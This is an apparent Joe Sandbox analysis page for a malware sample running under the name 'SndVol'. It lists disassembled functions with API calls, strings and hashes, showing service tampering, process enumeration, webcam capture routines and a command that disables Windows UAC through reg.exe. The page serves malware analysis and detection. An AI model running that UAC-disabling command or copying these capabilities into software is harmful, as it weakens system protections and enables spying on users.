Opcode ID: 296aa1fc45bd8a97e11338d30c2ad026eda8063a32206ad78c4166fd1b77079b
Instruction ID: 70b1090fae1e227f683cb453781c07f8627173f45cdf0592596fa2fd3c04b11c
Opcode Fuzzy Hash: 296aa1fc45bd8a97e11338d30c2ad026eda8063a32206ad78c4166fd1b77079b
Instruction Fuzzy Hash: 1C213E325002189BDB10FF68DC449DD77B89F85324F200A76E944E72A1EF74BE418BD5

Function 00418C2E Relevance: 9.1, APIs: 6, Instructions: 67serviceCOMMON

Download Yara Rule

APIs

OpenSCManagerW.ADVAPI32(00000000,00000000,00000002,00000000,00000000,?,?,?,00418344,00000000), ref: 00418C3E
OpenServiceW.ADVAPI32(00000000,00000000,00000002,?,?,?,00418344,00000000), ref: 00418C52
CloseServiceHandle.ADVAPI32(00000000,?,?,?,00418344,00000000), ref: 00418C5F
ChangeServiceConfigW.ADVAPI32(00000000,000000FF,00000004,000000FF,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,00418344,00000000), ref: 00418C94
CloseServiceHandle.ADVAPI32(00000000,?,?,?,00418344,00000000), ref: 00418CA6
CloseServiceHandle.ADVAPI32(00000000,?,?,?,00418344,00000000), ref: 00418CA9

Memory Dump Source

Source File: 00000009.00000002.3761745224.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_SndVol.jbxd

Yara matches

Similarity

API ID: Service$CloseHandle$Open$ChangeConfigManager
String ID:
API String ID: 493672254-0
Opcode ID: e5fb97a0e042aa3cf5d98ae642475e55fc2ba561f34e835e136d8c0823c8ccc0
Instruction ID: 151ede47f5a01f66990efdacd58a0b59027112db6305451f0336687f4909308b
Opcode Fuzzy Hash: e5fb97a0e042aa3cf5d98ae642475e55fc2ba561f34e835e136d8c0823c8ccc0
Instruction Fuzzy Hash: A20149711862183AE6108B389C4EEBB3A6CDB42771F14032FF925A32D1EE68CD4185F9

Function 00445725 Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(00000020,?,00438595,?,?,?,00439FB1,?,?,00000020,00000000,?,?,?,0042BAB6,0000003B), ref: 00445729
_free.LIBCMT ref: 0044575C
_free.LIBCMT ref: 00445784
SetLastError.KERNEL32(00000000,00439FB1,?,?,00000020,00000000,?,?,?,0042BAB6,0000003B,?,00000041,00000000,00000000), ref: 00445791
SetLastError.KERNEL32(00000000,00439FB1,?,?,00000020,00000000,?,?,?,0042BAB6,0000003B,?,00000041,00000000,00000000), ref: 0044579D
_abort.LIBCMT ref: 004457A3

Memory Dump Source

Source File: 00000009.00000002.3761745224.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_SndVol.jbxd

Yara matches

Similarity

API ID: ErrorLast$_free$_abort
String ID:
API String ID: 3160817290-0
Opcode ID: 2164e89f114e7cf86b97a0d05c6cee2e89ce7be6ffa074a4cf04242e0fee9013
Instruction ID: 2afc6a99b93033dbed13f8def56e2284daf42193b39b630cfab03248b002a5f8
Opcode Fuzzy Hash: 2164e89f114e7cf86b97a0d05c6cee2e89ce7be6ffa074a4cf04242e0fee9013
Instruction Fuzzy Hash: 6EF0FE35100F0067FA117B367C8AB2F1A695FC2B2AF21013BF419D6293EE3DC902452D

Function 049264BD Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,0491FC32,0491932D,0491FC32,00471E90,?,0491D9B2,FF8BC35D,00471E90,00471E90), ref: 049264C1
_free.LIBCMT ref: 049264F4
_free.LIBCMT ref: 0492651C
SetLastError.KERNEL32(00000000,FF8BC35D,00471E90,00471E90), ref: 04926529
SetLastError.KERNEL32(00000000,FF8BC35D,00471E90,00471E90), ref: 04926535
_abort.LIBCMT ref: 0492653B

Memory Dump Source

Source File: 00000009.00000002.3762836955.00000000048E0000.00000040.00000400.00020000.00000000.sdmp, Offset: 048E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_48e0000_SndVol.jbxd

Yara matches

Similarity

API ID: ErrorLast$_free$_abort
String ID:
API String ID: 3160817290-0
Opcode ID: 2164e89f114e7cf86b97a0d05c6cee2e89ce7be6ffa074a4cf04242e0fee9013
Instruction ID: 97c588c807601fc1a46998a26b2a592aca42c5afa0284ba6a8d53f99eda47f6f
Opcode Fuzzy Hash: 2164e89f114e7cf86b97a0d05c6cee2e89ce7be6ffa074a4cf04242e0fee9013
Instruction Fuzzy Hash: D7F0283520063236E3117B397F08F5B266A9BD2A2AF214138F819D359CFE75FD019265

Function 00418A5C Relevance: 9.0, APIs: 6, Instructions: 45serviceCOMMON

Download Yara Rule

APIs

OpenSCManagerW.ADVAPI32(00000000,00000000,00000020,00000000,00000001,?,?,?,?,?,?,004185D9,00000000), ref: 00418A6B
OpenServiceW.ADVAPI32(00000000,00000000,00000020,?,?,?,?,?,?,004185D9,00000000), ref: 00418A7F
CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,004185D9,00000000), ref: 00418A8C
ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,004185D9,00000000), ref: 00418A9B
CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,004185D9,00000000), ref: 00418AAD
CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,004185D9,00000000), ref: 00418AB0

Memory Dump Source

Source File: 00000009.00000002.3761745224.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_SndVol.jbxd

Yara matches

Similarity

API ID: Service$CloseHandle$Open$ControlManager
String ID:
API String ID: 221034970-0
Opcode ID: 3bbd86ba799800cf7f8ce060c277169374427670bb2790cc1e4148a280c4ce89
Instruction ID: 4afe7732e2fa81f36ccf108e41ed7890102f29a09d0e479adccf976045b68e04
Opcode Fuzzy Hash: 3bbd86ba799800cf7f8ce060c277169374427670bb2790cc1e4148a280c4ce89
Instruction Fuzzy Hash: A4F0C2315013186BD210EBA5DC89EBF3BACDF45B96B41002BFD0993192DF38CD4689E9

Function 00418B60 Relevance: 9.0, APIs: 6, Instructions: 45serviceCOMMON

Download Yara Rule

APIs

OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,00000001,?,?,?,?,?,?,00418559,00000000), ref: 00418B6F
OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,00418559,00000000), ref: 00418B83
CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00418559,00000000), ref: 00418B90
ControlService.ADVAPI32(00000000,00000002,?,?,?,?,?,?,?,00418559,00000000), ref: 00418B9F
CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00418559,00000000), ref: 00418BB1
CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00418559,00000000), ref: 00418BB4

Memory Dump Source

Source File: 00000009.00000002.3761745224.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_SndVol.jbxd

Yara matches

Similarity

API ID: Service$CloseHandle$Open$ControlManager
String ID:
API String ID: 221034970-0
Opcode ID: 51d638f86096adaa624434d30e6a89006adfc0cfe1ec13e8d912c26abb46eda1
Instruction ID: 20460b91a854b5e3c53015269073f2e928c2deccd9acf6b4d89527a320d4dccf
Opcode Fuzzy Hash: 51d638f86096adaa624434d30e6a89006adfc0cfe1ec13e8d912c26abb46eda1
Instruction Fuzzy Hash: 22F0C2715402186BD210EB65DC89EBF3BACDB45B52B81006AFE09A3192DE38DD4589E9

Function 00418BC7 Relevance: 9.0, APIs: 6, Instructions: 45serviceCOMMON

Download Yara Rule

APIs

OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,00000001,?,?,?,?,?,?,004184D9,00000000), ref: 00418BD6
OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,004184D9,00000000), ref: 00418BEA
CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,004184D9,00000000), ref: 00418BF7
ControlService.ADVAPI32(00000000,00000003,?,?,?,?,?,?,?,004184D9,00000000), ref: 00418C06
CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,004184D9,00000000), ref: 00418C18
CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,004184D9,00000000), ref: 00418C1B

Memory Dump Source

Source File: 00000009.00000002.3761745224.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_SndVol.jbxd

Yara matches

Similarity

API ID: Service$CloseHandle$Open$ControlManager
String ID:
API String ID: 221034970-0
Opcode ID: 0684a22c1c03eddcd9e7afcbe452ed3b601dba84a8ad96751855c8c9c88a9e76
Instruction ID: 1da220ff3ffe1d32b0df5c47a21bcd1adf2661b27de4fa42f8fed5365a22baa8
Opcode Fuzzy Hash: 0684a22c1c03eddcd9e7afcbe452ed3b601dba84a8ad96751855c8c9c88a9e76
Instruction Fuzzy Hash: 32F0C2715012186BD210EB65EC89DBF3BACDB45B51B41002AFE0993192DF38CD4589F9

Function 048EA405 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 58sleepfileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,048EA4DD), ref: 048EA43B
GetFileSize.KERNEL32(00000000,00000000,?,?,?,048EA4DD), ref: 048EA44A
Sleep.KERNEL32(00002710,?,?,?,048EA4DD), ref: 048EA477
CloseHandle.KERNEL32(00000000,?,?,?,048EA4DD), ref: 048EA47E

Strings

h G, xrefs: 048EA430

Memory Dump Source

Source File: 00000009.00000002.3762836955.00000000048E0000.00000040.00000400.00020000.00000000.sdmp, Offset: 048E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_48e0000_SndVol.jbxd

Yara matches

Similarity

API ID: File$CloseCreateHandleSizeSleep
String ID: h G
API String ID: 1958988193-3300504347
Opcode ID: 2165585e5b18e3410dae2497746dd606356f3a02818af73040aae92c32689789
Instruction ID: 163d87a489a4e6ffe1251f840c5b4e6d25783326c3e5547244f917c35bed977f
Opcode Fuzzy Hash: 2165585e5b18e3410dae2497746dd606356f3a02818af73040aae92c32689789
Instruction Fuzzy Hash: 10110D706003806AE7357726ED8CA3E7B9BBB47B59F440E58F681C3991C6947944832B

Function 0041B2C4 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 57registryCOMMON

Download Yara Rule

APIs

RegisterClassExA.USER32(00000030), ref: 0041B310
CreateWindowExA.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,000000FD,00000000,00000000,00000000), ref: 0041B32B
GetLastError.KERNEL32 ref: 0041B335

Strings

0, xrefs: 0041B2E0
MsgWindowClass, xrefs: 0041B2DB

Memory Dump Source

Source File: 00000009.00000002.3761745224.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_SndVol.jbxd

Yara matches

Similarity

API ID: ClassCreateErrorLastRegisterWindow
String ID: 0$MsgWindowClass
API String ID: 2877667751-2410386613
Opcode ID: 5c8849b15fa1cc9467c1d7fb15406a30d7545ffe8e7388a5e40320623bb372a5
Instruction ID: 33db8f89e50e9671cec9701a72200cc03bcb20702a276687bfdd99081a41ce18
Opcode Fuzzy Hash: 5c8849b15fa1cc9467c1d7fb15406a30d7545ffe8e7388a5e40320623bb372a5
Instruction Fuzzy Hash: 1F0125B190031CABDB10DFE5EC849EFBBBCFB08355F40052AF810A2250E77599048AA4

Function 00437603 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 48COMMONLIBRARYCODE

Download Yara Rule

APIs

___BuildCatchObject.LIBVCRUNTIME ref: 0043761A

Part of subcall function 00437C52: ___AdjustPointer.LIBCMT ref: 00437C9C

_UnwindNestedFrames.LIBCMT ref: 00437631
___FrameUnwindToState.LIBVCRUNTIME ref: 00437643
CallCatchBlock.LIBVCRUNTIME ref: 00437667

Strings

/zC, xrefs: 00437626, 00437617

Memory Dump Source

Source File: 00000009.00000002.3761745224.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_SndVol.jbxd

Yara matches

Similarity

API ID: CatchUnwind$AdjustBlockBuildCallFrameFramesNestedObjectPointerState
String ID: /zC
API String ID: 2633735394-4132788633
Opcode ID: f1135f3da04ba3a0995d0d42191a6de0eafd24a9b56dad318990318c05e81e44
Instruction ID: d669bc69f5b2d8c9fbf55978af89ff33433ac2085b506f133949dc977f569c90
Opcode Fuzzy Hash: f1135f3da04ba3a0995d0d42191a6de0eafd24a9b56dad318990318c05e81e44
Instruction Fuzzy Hash: 44012D72004508BBCF225F56CC42EDA3BBAEF4C764F15501AFA9861220C33AE861DF98

Function 0041739D Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 43COMMON

Download Yara Rule

APIs

GetSystemMetrics.USER32(0000004C), ref: 004173AA
GetSystemMetrics.USER32(0000004D), ref: 004173B0
GetSystemMetrics.USER32(0000004E), ref: 004173B6
GetSystemMetrics.USER32(0000004F), ref: 004173BC

Strings

]tA, xrefs: 004173EB

Memory Dump Source

Source File: 00000009.00000002.3761745224.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_SndVol.jbxd

Yara matches

Similarity

API ID: MetricsSystem
String ID: ]tA
API String ID: 4116985748-3517819141
Opcode ID: 812a9219b2c6697e1b7e6c0967c7113de32af3875f372bd592213eda7148f6bd
Instruction ID: 3cbdadbf3de93f5eefc1923f71e525f4be7d9c38d0567e5d5edaddbebabc810f
Opcode Fuzzy Hash: 812a9219b2c6697e1b7e6c0967c7113de32af3875f372bd592213eda7148f6bd
Instruction Fuzzy Hash: 64F0AFB1B043254BD700EA7A8C41A6FAAE59BD4274F11443FFA09C7282EEB8DC458B94

Function 0040E501 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 43processCOMMON

Download Yara Rule

APIs

CreateProcessA.KERNEL32(C:\Windows\System32\cmd.exe,/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f,00000000,00000000,00000000,08000000,00000000,00000000,?,?,?,?,?,?,00000000,00471FFC), ref: 0040E547
CloseHandle.KERNEL32(?,?,?,?,?,00000000,00471FFC), ref: 0040E556
CloseHandle.KERNEL32(?,?,?,?,?,00000000,00471FFC), ref: 0040E55B

Strings

C:\Windows\System32\cmd.exe, xrefs: 0040E542
/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f, xrefs: 0040E53D

Memory Dump Source

Source File: 00000009.00000002.3761745224.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_SndVol.jbxd

Yara matches

Similarity

API ID: CloseHandle$CreateProcess
String ID: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f$C:\Windows\System32\cmd.exe
API String ID: 2922976086-4183131282
Opcode ID: 5cb763d495b165fc4f9c66d013102bd94a78ddd016aca5e3dc924e3fee2ecf0f
Instruction ID: 9c8cd13d2f2f5b55d8ef3643fb71004f418ed3317f879fdff7c1c4061e2abca7
Opcode Fuzzy Hash: 5cb763d495b165fc4f9c66d013102bd94a78ddd016aca5e3dc924e3fee2ecf0f
Instruction Fuzzy Hash: 1AF06276D0029C7ACB20AAD7AC0DEDF7F3CEBC6B11F00005AB504A2050D5746540CAB5

Function 0044083A Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,004407EB,?,?,0044078B,?), ref: 0044085A
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0044086D
FreeLibrary.KERNEL32(00000000,?,?,?,004407EB,?,?,0044078B,?), ref: 00440890

Strings

mscoree.dll, xrefs: 00440853
CorExitProcess, xrefs: 00440865

Memory Dump Source

Source File: 00000009.00000002.3761745224.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_SndVol.jbxd

Yara matches

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: cfbbdf30ec96b6666769d195f1efe458a00f065bb439fa98bb073361271b6784
Instruction ID: 0a8d3f567fe41ef9be558500660f8c42ae883db5e601ee7dbbda2c1d2cd30ed9
Opcode Fuzzy Hash: cfbbdf30ec96b6666769d195f1efe458a00f065bb439fa98bb073361271b6784
Instruction Fuzzy Hash: EAF0A431900618BBDB10AF61DC09BAEBFB4DB04756F510275F905A2261CB74CE54CA98

Function 004050C4 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 35synchronizationCOMMON

Download Yara Rule

APIs

CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00405100
SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00404E5A,00000001), ref: 0040510C
WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,?,?,?,?,?,?,?,?,00404E5A,00000001), ref: 00405117
CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00404E5A,00000001), ref: 00405120

Part of subcall function 004194DA: GetLocalTime.KERNEL32(00000000), ref: 004194F4

Strings

Connection KeepAlive | Disabled, xrefs: 004050D9

Memory Dump Source

Source File: 00000009.00000002.3761745224.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_SndVol.jbxd

Yara matches

Similarity

API ID: Event$CloseCreateHandleLocalObjectSingleTimeWait
String ID: Connection KeepAlive | Disabled
API String ID: 2993684571-3818284553
Opcode ID: 3c7acb05a4e0257c4243895fd0c0a32a1713874f0248c7c788b0d5ac90108107
Instruction ID: 9f72672606b7a98fb4f6c5586ee23e87f0057564a74405461857646c77684129
Opcode Fuzzy Hash: 3c7acb05a4e0257c4243895fd0c0a32a1713874f0248c7c788b0d5ac90108107
Instruction Fuzzy Hash: 73F09671D047007FEB1037759D0AA6B7F98DB02315F44096EF882526E1D5B988509B5A

Function 004013F2 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 7libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(User32.dll,GetCursorInfo), ref: 004013FC
GetProcAddress.KERNEL32(00000000), ref: 00401403

Strings

GetCursorInfo, xrefs: 004013F2
`ou, xrefs: 004013FC
User32.dll, xrefs: 004013F7

Memory Dump Source

Source File: 00000009.00000002.3761745224.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_SndVol.jbxd

Yara matches

Similarity

API ID: AddressHandleModuleProc
String ID: GetCursorInfo$User32.dll$`ou
API String ID: 1646373207-4165041016
Opcode ID: 088d9d047025d8497e924925820d5eb65f0f262b7c85d6662a4774416c360c30
Instruction ID: b28a71f0ab0cd05a0e9183a6667f806437ada0decc35e30242c3667109896680
Opcode Fuzzy Hash: 088d9d047025d8497e924925820d5eb65f0f262b7c85d6662a4774416c360c30
Instruction Fuzzy Hash: 8BB09BB5741301BB8A017B705E0D905357C550470375102A3B00386161F7F44500C61E

Function 0043BB4A Relevance: 7.7, APIs: 5, Instructions: 222COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.3761745224.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_SndVol.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 675a2b2e16e95726d0081b70f545144743ae2c0fe8ff8d83379613ee76e05ba8
Instruction ID: 08a5b5d7c592992a36ca4e715a0fda7f3efcfcd9ac9fa05da90acde50f0064fb
Opcode Fuzzy Hash: 675a2b2e16e95726d0081b70f545144743ae2c0fe8ff8d83379613ee76e05ba8
Instruction Fuzzy Hash: C471C3319002169BCB21CF55C884BFFBB75EF99320F24622BEA5167241DB788D41CBE9

Function 00404351 Relevance: 7.7, APIs: 1, Strings: 4, Instructions: 206sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(00000000,0040BE20), ref: 004044A4

Part of subcall function 004045E7: __EH_prolog.LIBCMT ref: 004045EC

Strings

CloseCamera, xrefs: 0040456E
GetFrame, xrefs: 0040457F
OpenCamera, xrefs: 00404562
FreeFrame, xrefs: 00404590

Memory Dump Source

Source File: 00000009.00000002.3761745224.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_SndVol.jbxd

Yara matches

Similarity

API ID: H_prologSleep
String ID: CloseCamera$FreeFrame$GetFrame$OpenCamera
API String ID: 3469354165-3547787478
Opcode ID: af6715aaa0d5b36cc8a5e63bd834b4e59a3ecd3df2cca7b880d435d9cf50a0b7
Instruction ID: 7794b0ea9bf29785644917a3a4e5658b539d561772896ef264e5995737b90c85
Opcode Fuzzy Hash: af6715aaa0d5b36cc8a5e63bd834b4e59a3ecd3df2cca7b880d435d9cf50a0b7
Instruction Fuzzy Hash: 5951E8B1B0420167C614BB769D5AA6E3795ABC0744F00053FFA45A77E2EF7C8D09C29E

Function 0044220D Relevance: 7.7, APIs: 5, Instructions: 187COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00443649: RtlAllocateHeap.NTDLL(00000000,00433049,?,P@,004365E7,?,?,00000000,?,P@,0040C88A,00433049,?,?,?,?), ref: 0044367B

_free.LIBCMT ref: 00442318
_free.LIBCMT ref: 0044232F
_free.LIBCMT ref: 0044234E
_free.LIBCMT ref: 00442369
_free.LIBCMT ref: 00442380

Memory Dump Source

Source File: 00000009.00000002.3761745224.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_SndVol.jbxd

Yara matches

Similarity

API ID: _free$AllocateHeap
String ID:
API String ID: 3033488037-0
Opcode ID: bba606fc377604b84075189b83cc930c3fba5f0d417d2f8c667cfcff3c73436f
Instruction ID: f6524bd8b7bf53f5b45239f2df66d8239dbe938cd5ee0330fa6954bf91cd2c46
Opcode Fuzzy Hash: bba606fc377604b84075189b83cc930c3fba5f0d417d2f8c667cfcff3c73436f
Instruction Fuzzy Hash: 2951C331A00704AFEB20DF6AC941A6A77F4FF49724F54466EF809DB250E7B9DA018B48

Function 00446894 Relevance: 7.7, APIs: 5, Instructions: 171timeCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,0045C1E4), ref: 004468FE
WideCharToMultiByte.KERNEL32(00000000,00000000,0046F754,000000FF,00000000,0000003F,00000000,?,?), ref: 00446976
WideCharToMultiByte.KERNEL32(00000000,00000000,0046F7A8,000000FF,?,0000003F,00000000,?), ref: 004469A3
_free.LIBCMT ref: 004468EC

Part of subcall function 00443C92: HeapFree.KERNEL32(00000000,00000000,?,0044DE4F,?,00000000,?,00000000,?,0044E0F3,?,00000007,?,?,0044E63E,?), ref: 00443CA8
Part of subcall function 00443C92: GetLastError.KERNEL32(?,?,0044DE4F,?,00000000,?,00000000,?,0044E0F3,?,00000007,?,?,0044E63E,?,?), ref: 00443CBA

_free.LIBCMT ref: 00446AB8

Memory Dump Source

Source File: 00000009.00000002.3761745224.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_SndVol.jbxd

Yara matches

Similarity

API ID: ByteCharMultiWide_free$ErrorFreeHeapInformationLastTimeZone
String ID:
API String ID: 1286116820-0
Opcode ID: 13e783ce7238224165918a71ff61bbb040dde026da6db54b448d3cbd4e0f0125
Instruction ID: 7fd05a225221f517daf6149bd07272def0d2f8fc9e30777fa7538f83a84e5ba5
Opcode Fuzzy Hash: 13e783ce7238224165918a71ff61bbb040dde026da6db54b448d3cbd4e0f0125
Instruction Fuzzy Hash: 63511DB1900205ABEB10EF65DC8196A77BCEF42714B12027FE454A7291EBB89E44CB5E

Function 0492762C Relevance: 7.7, APIs: 5, Instructions: 171timeCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,0045C1E4), ref: 04927696
WideCharToMultiByte.KERNEL32(00000000,00000000,0046F754,000000FF,00000000,0000003F,00000000,?,?), ref: 0492770E
WideCharToMultiByte.KERNEL32(00000000,00000000,0046F7A8,000000FF,?,0000003F,00000000,?), ref: 0492773B
_free.LIBCMT ref: 04927684

Part of subcall function 04924A2A: HeapFree.KERNEL32(00000000,00000000,?,0492EBE7,?,00000000,?,00000000,?,0492EE8B,?,00000007,?,?,0492F3D6,?), ref: 04924A40
Part of subcall function 04924A2A: GetLastError.KERNEL32(?,?,0492EBE7,?,00000000,?,00000000,?,0492EE8B,?,00000007,?,?,0492F3D6,?,?), ref: 04924A52

_free.LIBCMT ref: 04927850

Memory Dump Source

Source File: 00000009.00000002.3762836955.00000000048E0000.00000040.00000400.00020000.00000000.sdmp, Offset: 048E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_48e0000_SndVol.jbxd

Yara matches

Similarity

API ID: ByteCharMultiWide_free$ErrorFreeHeapInformationLastTimeZone
String ID:
API String ID: 1286116820-0
Opcode ID: 13e783ce7238224165918a71ff61bbb040dde026da6db54b448d3cbd4e0f0125
Instruction ID: 8ba5c3f290513dc6a0c2fcf71d3986616c6a927707e76fa42a8f43081d1d81cb
Opcode Fuzzy Hash: 13e783ce7238224165918a71ff61bbb040dde026da6db54b448d3cbd4e0f0125
Instruction Fuzzy Hash: DE51E771900229EBDB10EFE99E809AA77FCEF84315B1006FAE454A7194FB70AE44CB55

Function 0040E2E7 Relevance: 7.6, APIs: 5, Instructions: 132processCOMMON

Download Yara Rule

APIs

Part of subcall function 00419F23: GetCurrentProcess.KERNEL32(?,?,?,0040C663,WinDir,00000000,00000000), ref: 00419F34

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0040E305
Process32FirstW.KERNEL32(00000000,?), ref: 0040E329
Process32NextW.KERNEL32(00000000,0000022C), ref: 0040E338
CloseHandle.KERNEL32(00000000), ref: 0040E4EF

Part of subcall function 00419F51: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,0040DFB9,00000000,?,?,00000001), ref: 00419F66

Part of subcall function 00419F87: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000), ref: 00419F9C

Process32NextW.KERNEL32(00000000,0000022C), ref: 0040E4E0

Memory Dump Source

Source File: 00000009.00000002.3761745224.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_SndVol.jbxd

Yara matches

Similarity

API ID: ProcessProcess32$NextOpen$CloseCreateCurrentFirstHandleSnapshotToolhelp32
String ID:
API String ID: 1735047541-0
Opcode ID: 322a21650b7cdb691a380e1f32b584157382834de1627d8e80e9ce1f3e3b7542
Instruction ID: 9ef93eb2fb75da2762b4731e21c5b8dc01158be40bd3d18dbb98703d8f1b3e60
Opcode Fuzzy Hash: 322a21650b7cdb691a380e1f32b584157382834de1627d8e80e9ce1f3e3b7542
Instruction Fuzzy Hash: 904101311082415BC365F761D991EEFB3A8AFD4344F50493EF48A921E2EF38994AC75A

Function 004412F9 Relevance: 7.6, APIs: 5, Instructions: 129COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 0044136B
_free.LIBCMT ref: 0044138B

Memory Dump Source

Source File: 00000009.00000002.3761745224.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_SndVol.jbxd

Yara matches

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: 76d0ae20e321c1f8d33a0e61d3fd8decc26b720c3d8a788f20ca92602b864a36
Instruction ID: cd63c3b426f476a3995244c06b7e284d95fcad26de8669326c9f329b52a78418
Opcode Fuzzy Hash: 76d0ae20e321c1f8d33a0e61d3fd8decc26b720c3d8a788f20ca92602b864a36
Instruction Fuzzy Hash: AE41E132E002049FEB10DF79C981A5EB3F5EF88718F1585AAE915EB351EA74AD41CB84

Function 0044E30C Relevance: 7.6, APIs: 5, Instructions: 110COMMONLIBRARYCODE

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(?,00000000,?,00000000,00000000,00000000,0042BAB6,?,?,?,00000001,00000000,?,00000001,0042BAB6,0042BAB6), ref: 0044E359
